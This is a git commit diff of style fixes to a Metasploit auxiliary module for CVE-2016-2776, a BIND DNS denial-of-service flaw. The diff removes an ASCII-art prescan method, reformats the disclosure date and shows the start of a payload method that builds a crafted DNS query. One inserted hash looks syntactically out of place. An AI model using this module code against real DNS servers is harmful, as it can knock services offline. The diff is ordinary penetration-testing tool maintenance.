Fixing MSF Code Style

bug/bundler_fix
Ale 2016-09-30 13:42:30 -03:00
parent 143a4af73d
commit c699c7c506
1 changed files with 21 additions and 50 deletions

View File

@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary
[ 'CVE', '2016-2776' ],
[ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
],
'DisclosureDate' => '2016-09-27'
'DisclosureDate' => 'Sep 27 2016',
{
'ScannerRecvWindow' => 0
}
))
register_options([
@ -45,37 +48,6 @@ class MetasploitModule < Msf::Auxiliary
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
end
def scanner_prescan(batch)
puts '''
....
,....
..........7
7...............7
........ 7..
.I I.
.,
~...., 7.. I.
....................
......................7
........................I
........................
..........................
..........................
=...........................
............................
............................
+..........................,
..........................7
:.........................
........................
+....................,
7..................7
7~............:7
7+,,+777
'''
datastore['ScannerRecvWindow'] = 0
end
def checkServerStatus(ip, rport)
res = ""
sudp = UDPSocket.new
@ -108,7 +80,6 @@ class MetasploitModule < Msf::Auxiliary
end
def payload
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
query += "\x00\x00" # Flags: 0x0000 Standard query
query += "\x00\x01" # Questions: 1